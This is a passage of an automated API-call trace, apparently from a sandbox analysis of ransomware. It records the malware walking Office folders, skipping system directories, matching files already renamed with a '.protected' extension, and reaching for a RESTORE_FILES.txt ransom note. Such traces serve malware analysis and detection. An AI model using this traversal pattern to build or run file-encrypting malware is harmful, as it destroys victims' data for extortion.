[0093.204] lstrcmpiW (lpString1="OUTLLIBR.DLL.trx_dll.protected", lpString2="Windows") returned -1 [0093.204] lstrcmpiW (lpString1="OUTLLIBR.DLL.trx_dll.protected", lpString2="Program Files") returned -1 [0093.204] lstrcmpiW (lpString1="OUTLLIBR.DLL.trx_dll.protected", lpString2="Program Files (x86)") returned -1 [0093.204] lstrcmpiW (lpString1="OUTLLIBR.DLL.trx_dll.protected", lpString2="$Recycle.bin") returned 1 [0093.204] lstrcmpiW (lpString1="OUTLLIBR.DLL.trx_dll.protected", lpString2="System Volume Information") returned -1 [0093.204] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLLIBR.DLL.trx_dll.protected") returned 86 [0093.204] StrStrIW (lpFirst="OUTLLIBR.DLL.trx_dll.protected", lpSrch=".protected") returned=".protected" [0093.204] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.204] lstrcmpiW (lpString1="OUTLLIBR.REST.trx_dll.protected", lpString2="Windows") returned -1 [0093.204] lstrcmpiW (lpString1="OUTLLIBR.REST.trx_dll.protected", lpString2="Program Files") returned -1 [0093.205] lstrcmpiW (lpString1="OUTLLIBR.REST.trx_dll.protected", lpString2="Program Files (x86)") returned -1 [0093.205] lstrcmpiW (lpString1="OUTLLIBR.REST.trx_dll.protected", lpString2="$Recycle.bin") returned 1 [0093.205] lstrcmpiW (lpString1="OUTLLIBR.REST.trx_dll.protected", lpString2="System Volume Information") returned -1 [0093.205] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLLIBR.REST.trx_dll.protected") returned 87 [0093.205] StrStrIW (lpFirst="OUTLLIBR.REST.trx_dll.protected", lpSrch=".protected") returned=".protected" [0093.205] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.205] lstrcmpiW (lpString1="OUTLWVW.DLL.trx_dll.protected", lpString2="Windows") returned -1 [0093.205] lstrcmpiW (lpString1="OUTLWVW.DLL.trx_dll.protected", lpString2="Program Files") returned -1 [0093.205] lstrcmpiW (lpString1="OUTLWVW.DLL.trx_dll.protected", lpString2="Program Files (x86)") returned -1 [0093.205] lstrcmpiW (lpString1="OUTLWVW.DLL.trx_dll.protected", lpString2="$Recycle.bin") returned 1 [0093.205] lstrcmpiW (lpString1="OUTLWVW.DLL.trx_dll.protected", lpString2="System Volume Information") returned -1 [0093.205] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLWVW.DLL.trx_dll.protected") returned 85 [0093.205] StrStrIW (lpFirst="OUTLWVW.DLL.trx_dll.protected", lpSrch=".protected") returned=".protected" [0093.205] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.205] lstrcmpiW (lpString1="PPINTL.DLL.trx_dll.protected", lpString2="Windows") returned -1 [0093.205] lstrcmpiW (lpString1="PPINTL.DLL.trx_dll.protected", lpString2="Program Files") returned -1 [0093.205] lstrcmpiW (lpString1="PPINTL.DLL.trx_dll.protected", lpString2="Program Files (x86)") returned -1 [0093.205] lstrcmpiW (lpString1="PPINTL.DLL.trx_dll.protected", lpString2="$Recycle.bin") returned 1 [0093.205] lstrcmpiW (lpString1="PPINTL.DLL.trx_dll.protected", lpString2="System Volume Information") returned -1 [0093.205] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\PPINTL.DLL.trx_dll.protected") returned 84 [0093.205] StrStrIW (lpFirst="PPINTL.DLL.trx_dll.protected", lpSrch=".protected") returned=".protected" [0093.205] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.205] lstrcmpiW (lpString1="PPINTL.REST.trx_dll.protected", lpString2="Windows") returned -1 [0093.205] lstrcmpiW (lpString1="PPINTL.REST.trx_dll.protected", lpString2="Program Files") returned -1 [0093.205] lstrcmpiW (lpString1="PPINTL.REST.trx_dll.protected", lpString2="Program Files (x86)") returned -1 [0093.205] lstrcmpiW (lpString1="PPINTL.REST.trx_dll.protected", lpString2="$Recycle.bin") returned 1 [0093.205] lstrcmpiW (lpString1="PPINTL.REST.trx_dll.protected", lpString2="System Volume Information") returned -1 [0093.205] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\PPINTL.REST.trx_dll.protected") returned 85 [0093.205] StrStrIW (lpFirst="PPINTL.REST.trx_dll.protected", lpSrch=".protected") returned=".protected" [0093.205] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.205] lstrcmpiW (lpString1="PUB6INTL.DLL.trx_dll.protected", lpString2="Windows") returned -1 [0093.205] lstrcmpiW (lpString1="PUB6INTL.DLL.trx_dll.protected", lpString2="Program Files") returned 1 [0093.205] lstrcmpiW (lpString1="PUB6INTL.DLL.trx_dll.protected", lpString2="Program Files (x86)") returned 1 [0093.205] lstrcmpiW (lpString1="PUB6INTL.DLL.trx_dll.protected", lpString2="$Recycle.bin") returned 1 [0093.205] lstrcmpiW (lpString1="PUB6INTL.DLL.trx_dll.protected", lpString2="System Volume Information") returned -1 [0093.205] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\PUB6INTL.DLL.trx_dll.protected") returned 86 [0093.206] StrStrIW (lpFirst="PUB6INTL.DLL.trx_dll.protected", lpSrch=".protected") returned=".protected" [0093.206] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.206] lstrcmpiW (lpString1="PUB6INTL.REST.trx_dll.protected", lpString2="Windows") returned -1 [0093.206] lstrcmpiW (lpString1="PUB6INTL.REST.trx_dll.protected", lpString2="Program Files") returned 1 [0093.206] lstrcmpiW (lpString1="PUB6INTL.REST.trx_dll.protected", lpString2="Program Files (x86)") returned 1 [0093.206] lstrcmpiW (lpString1="PUB6INTL.REST.trx_dll.protected", lpString2="$Recycle.bin") returned 1 [0093.206] lstrcmpiW (lpString1="PUB6INTL.REST.trx_dll.protected", lpString2="System Volume Information") returned -1 [0093.206] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\PUB6INTL.REST.trx_dll.protected") returned 87 [0093.206] StrStrIW (lpFirst="PUB6INTL.REST.trx_dll.protected", lpSrch=".protected") returned=".protected" [0093.206] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.206] lstrcmpiW (lpString1="PUBWZINT.REST.trx_dll.protected", lpString2="Windows") returned -1 [0093.206] lstrcmpiW (lpString1="PUBWZINT.REST.trx_dll.protected", lpString2="Program Files") returned 1 [0093.206] lstrcmpiW (lpString1="PUBWZINT.REST.trx_dll.protected", lpString2="Program Files (x86)") returned 1 [0093.206] lstrcmpiW (lpString1="PUBWZINT.REST.trx_dll.protected", lpString2="$Recycle.bin") returned 1 [0093.206] lstrcmpiW (lpString1="PUBWZINT.REST.trx_dll.protected", lpString2="System Volume Information") returned -1 [0093.206] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\PUBWZINT.REST.trx_dll.protected") returned 87 [0093.206] StrStrIW (lpFirst="PUBWZINT.REST.trx_dll.protected", lpSrch=".protected") returned=".protected" [0093.206] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.206] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.206] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.206] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.206] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.206] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\RESTORE_FILES.txt") returned 73 [0093.206] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.206] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.206] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.206] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\SGRES.DLL.trx_dll.protected") returned 83 [0093.206] StrStrIW (lpFirst="SGRES.DLL.trx_dll.protected", lpSrch=".protected") returned=".protected" [0093.206] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.206] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\STINTL.DLL.trx_dll.protected") returned 84 [0093.207] StrStrIW (lpFirst="STINTL.DLL.trx_dll.protected", lpSrch=".protected") returned=".protected" [0093.207] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.207] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\VISBRRES.DLL.trx_dll.protected") returned 86 [0093.207] StrStrIW (lpFirst="VISBRRES.DLL.trx_dll.protected", lpSrch=".protected") returned=".protected" [0093.207] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.207] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\VISINTL.DLL.trx_dll.protected") returned 85 [0093.207] StrStrIW (lpFirst="VISINTL.DLL.trx_dll.protected", lpSrch=".protected") returned=".protected" [0093.207] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.207] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\WWINTL.DLL.trx_dll.protected") returned 84 [0093.207] StrStrIW (lpFirst="WWINTL.DLL.trx_dll.protected", lpSrch=".protected") returned=".protected" [0093.207] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.207] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\WWINTL.REST.trx_dll.protected") returned 85 [0093.207] StrStrIW (lpFirst="WWINTL.REST.trx_dll.protected", lpSrch=".protected") returned=".protected" [0093.207] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.207] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\XLINTL32.DLL.trx_dll.protected") returned 86 [0093.207] StrStrIW (lpFirst="XLINTL32.DLL.trx_dll.protected", lpSrch=".protected") returned=".protected" [0093.207] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.207] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\XLINTL32.REST.trx_dll.protected") returned 87 [0093.207] StrStrIW (lpFirst="XLINTL32.REST.trx_dll.protected", lpSrch=".protected") returned=".protected" [0093.207] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.207] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\XLSLICER.DLL.trx_dll.protected") returned 86 [0093.207] StrStrIW (lpFirst="XLSLICER.DLL.trx_dll.protected", lpSrch=".protected") returned=".protected" [0093.207] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0093.207] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0093.207] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\RESTORE_FILES.txt") returned 73 [0093.207] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.208] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.208] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082") returned 55 [0093.208] lstrcmpW (lpString1="3082", lpString2=".") returned 1 [0093.208] lstrcmpW (lpString1="3082", lpString2="..") returned 1 [0093.208] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\*") returned 57 [0093.208] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0093.208] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.208] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.208] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.208] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.208] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.208] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\.") returned 57 [0093.208] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.208] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.208] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.208] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.208] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.208] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.208] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.208] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\..") returned 58 [0093.208] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.208] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.208] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.208] lstrcmpiW (lpString1="ENVELOPR.DLL.trx_dll.protected", lpString2="Windows") returned -1 [0093.208] lstrcmpiW (lpString1="ENVELOPR.DLL.trx_dll.protected", lpString2="Program Files") returned -1 [0093.208] lstrcmpiW (lpString1="ENVELOPR.DLL.trx_dll.protected", lpString2="Program Files (x86)") returned -1 [0093.209] lstrcmpiW (lpString1="ENVELOPR.DLL.trx_dll.protected", lpString2="$Recycle.bin") returned 1 [0093.209] lstrcmpiW (lpString1="ENVELOPR.DLL.trx_dll.protected", lpString2="System Volume Information") returned -1 [0093.209] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\ENVELOPR.DLL.trx_dll.protected") returned 86 [0093.209] StrStrIW (lpFirst="ENVELOPR.DLL.trx_dll.protected", lpSrch=".protected") returned=".protected" [0093.209] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.209] lstrcmpiW (lpString1="GRINTL32.DLL.trx_dll.protected", lpString2="Windows") returned -1 [0093.209] lstrcmpiW (lpString1="GRINTL32.DLL.trx_dll.protected", lpString2="Program Files") returned -1 [0093.209] lstrcmpiW (lpString1="GRINTL32.DLL.trx_dll.protected", lpString2="Program Files (x86)") returned -1 [0093.209] lstrcmpiW (lpString1="GRINTL32.DLL.trx_dll.protected", lpString2="$Recycle.bin") returned 1 [0093.209] lstrcmpiW (lpString1="GRINTL32.DLL.trx_dll.protected", lpString2="System Volume Information") returned -1 [0093.209] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\GRINTL32.DLL.trx_dll.protected") returned 86 [0093.209] StrStrIW (lpFirst="GRINTL32.DLL.trx_dll.protected", lpSrch=".protected") returned=".protected" [0093.209] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.209] lstrcmpiW (lpString1="GRINTL32.REST.trx_dll.protected", lpString2="Windows") returned -1 [0093.209] lstrcmpiW (lpString1="GRINTL32.REST.trx_dll.protected", lpString2="Program Files") returned -1 [0093.209] lstrcmpiW (lpString1="GRINTL32.REST.trx_dll.protected", lpString2="Program Files (x86)") returned -1 [0093.209] lstrcmpiW (lpString1="GRINTL32.REST.trx_dll.protected", lpString2="$Recycle.bin") returned 1 [0093.209] lstrcmpiW (lpString1="GRINTL32.REST.trx_dll.protected", lpString2="System Volume Information") returned -1 [0093.209] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\GRINTL32.REST.trx_dll.protected") returned 87 [0093.209] StrStrIW (lpFirst="GRINTL32.REST.trx_dll.protected", lpSrch=".protected") returned=".protected" [0093.209] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.209] lstrcmpiW (lpString1="MAPIR.DLL.trx_dll.protected", lpString2="Windows") returned -1 [0093.209] lstrcmpiW (lpString1="MAPIR.DLL.trx_dll.protected", lpString2="Program Files") returned -1 [0093.209] lstrcmpiW (lpString1="MAPIR.DLL.trx_dll.protected", lpString2="Program Files (x86)") returned -1 [0093.209] lstrcmpiW (lpString1="MAPIR.DLL.trx_dll.protected", lpString2="$Recycle.bin") returned 1 [0093.209] lstrcmpiW (lpString1="MAPIR.DLL.trx_dll.protected", lpString2="System Volume Information") returned -1 [0093.209] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\MAPIR.DLL.trx_dll.protected") returned 83 [0093.209] StrStrIW (lpFirst="MAPIR.DLL.trx_dll.protected", lpSrch=".protected") returned=".protected" [0093.209] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.209] lstrcmpiW (lpString1="MOR6INT.REST.trx_dll.protected", lpString2="Windows") returned -1 [0093.209] lstrcmpiW (lpString1="MOR6INT.REST.trx_dll.protected", lpString2="Program Files") returned -1 [0093.209] lstrcmpiW (lpString1="MOR6INT.REST.trx_dll.protected", lpString2="Program Files (x86)") returned -1 [0093.209] lstrcmpiW (lpString1="MOR6INT.REST.trx_dll.protected", lpString2="$Recycle.bin") returned 1 [0093.209] lstrcmpiW (lpString1="MOR6INT.REST.trx_dll.protected", lpString2="System Volume Information") returned -1 [0093.209] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\MOR6INT.REST.trx_dll.protected") returned 86 [0093.210] StrStrIW (lpFirst="MOR6INT.REST.trx_dll.protected", lpSrch=".protected") returned=".protected" [0093.210] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.210] lstrcmpiW (lpString1="MSOINTL.DLL.trx_dll.protected", lpString2="Windows") returned -1 [0093.210] lstrcmpiW (lpString1="MSOINTL.DLL.trx_dll.protected", lpString2="Program Files") returned -1 [0093.210] lstrcmpiW (lpString1="MSOINTL.DLL.trx_dll.protected", lpString2="Program Files (x86)") returned -1 [0093.210] lstrcmpiW (lpString1="MSOINTL.DLL.trx_dll.protected", lpString2="$Recycle.bin") returned 1 [0093.210] lstrcmpiW (lpString1="MSOINTL.DLL.trx_dll.protected", lpString2="System Volume Information") returned -1 [0093.210] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\MSOINTL.DLL.trx_dll.protected") returned 85 [0093.210] StrStrIW (lpFirst="MSOINTL.DLL.trx_dll.protected", lpSrch=".protected") returned=".protected" [0093.210] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.210] lstrcmpiW (lpString1="MSOINTL.REST.trx_dll.protected", lpString2="Windows") returned -1 [0093.210] lstrcmpiW (lpString1="MSOINTL.REST.trx_dll.protected", lpString2="Program Files") returned -1 [0093.210] lstrcmpiW (lpString1="MSOINTL.REST.trx_dll.protected", lpString2="Program Files (x86)") returned -1 [0093.210] lstrcmpiW (lpString1="MSOINTL.REST.trx_dll.protected", lpString2="$Recycle.bin") returned 1 [0093.210] lstrcmpiW (lpString1="MSOINTL.REST.trx_dll.protected", lpString2="System Volume Information") returned -1 [0093.210] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\MSOINTL.REST.trx_dll.protected") returned 86 [0093.210] StrStrIW (lpFirst="MSOINTL.REST.trx_dll.protected", lpSrch=".protected") returned=".protected" [0093.210] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.210] lstrcmpiW (lpString1="OMSINTL.DLL.trx_dll.protected", lpString2="Windows") returned -1 [0093.210] lstrcmpiW (lpString1="OMSINTL.DLL.trx_dll.protected", lpString2="Program Files") returned -1 [0093.210] lstrcmpiW (lpString1="OMSINTL.DLL.trx_dll.protected", lpString2="Program Files (x86)") returned -1 [0093.210] lstrcmpiW (lpString1="OMSINTL.DLL.trx_dll.protected", lpString2="$Recycle.bin") returned 1 [0093.210] lstrcmpiW (lpString1="OMSINTL.DLL.trx_dll.protected", lpString2="System Volume Information") returned -1 [0093.210] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\OMSINTL.DLL.trx_dll.protected") returned 85 [0093.210] StrStrIW (lpFirst="OMSINTL.DLL.trx_dll.protected", lpSrch=".protected") returned=".protected" [0093.210] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.210] lstrcmpiW (lpString1="ONINTL.DLL.trx_dll.protected", lpString2="Windows") returned -1 [0093.210] lstrcmpiW (lpString1="ONINTL.DLL.trx_dll.protected", lpString2="Program Files") returned -1 [0093.210] lstrcmpiW (lpString1="ONINTL.DLL.trx_dll.protected", lpString2="Program Files (x86)") returned -1 [0093.210] lstrcmpiW (lpString1="ONINTL.DLL.trx_dll.protected", lpString2="$Recycle.bin") returned 1 [0093.210] lstrcmpiW (lpString1="ONINTL.DLL.trx_dll.protected", lpString2="System Volume Information") returned -1 [0093.210] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\ONINTL.DLL.trx_dll.protected") returned 84 [0093.210] StrStrIW (lpFirst="ONINTL.DLL.trx_dll.protected", lpSrch=".protected") returned=".protected" [0093.210] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.210] lstrcmpiW (lpString1="ONINTL.REST.trx_dll.protected", lpString2="Windows") returned -1 [0093.210] lstrcmpiW (lpString1="ONINTL.REST.trx_dll.protected", lpString2="Program Files") returned -1 [0093.210] lstrcmpiW (lpString1="ONINTL.REST.trx_dll.protected", lpString2="Program Files (x86)") returned -1 [0093.211] lstrcmpiW (lpString1="ONINTL.REST.trx_dll.protected", lpString2="$Recycle.bin") returned 1 [0093.211] lstrcmpiW (lpString1="ONINTL.REST.trx_dll.protected", lpString2="System Volume Information") returned -1 [0093.211] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\ONINTL.REST.trx_dll.protected") returned 85 [0093.211] StrStrIW (lpFirst="ONINTL.REST.trx_dll.protected", lpSrch=".protected") returned=".protected" [0093.211] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.211] lstrcmpiW (lpString1="OUTLLIBR.DLL.trx_dll.protected", lpString2="Windows") returned -1 [0093.211] lstrcmpiW (lpString1="OUTLLIBR.DLL.trx_dll.protected", lpString2="Program Files") returned -1 [0093.211] lstrcmpiW (lpString1="OUTLLIBR.DLL.trx_dll.protected", lpString2="Program Files (x86)") returned -1 [0093.211] lstrcmpiW (lpString1="OUTLLIBR.DLL.trx_dll.protected", lpString2="$Recycle.bin") returned 1 [0093.211] lstrcmpiW (lpString1="OUTLLIBR.DLL.trx_dll.protected", lpString2="System Volume Information") returned -1 [0093.211] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLLIBR.DLL.trx_dll.protected") returned 86 [0093.211] StrStrIW (lpFirst="OUTLLIBR.DLL.trx_dll.protected", lpSrch=".protected") returned=".protected" [0093.211] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.211] lstrcmpiW (lpString1="OUTLLIBR.REST.trx_dll.protected", lpString2="Windows") returned -1 [0093.211] lstrcmpiW (lpString1="OUTLLIBR.REST.trx_dll.protected", lpString2="Program Files") returned -1 [0093.211] lstrcmpiW (lpString1="OUTLLIBR.REST.trx_dll.protected", lpString2="Program Files (x86)") returned -1 [0093.211] lstrcmpiW (lpString1="OUTLLIBR.REST.trx_dll.protected", lpString2="$Recycle.bin") returned 1 [0093.211] lstrcmpiW (lpString1="OUTLLIBR.REST.trx_dll.protected", lpString2="System Volume Information") returned -1 [0093.211] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLLIBR.REST.trx_dll.protected") returned 87 [0093.211] 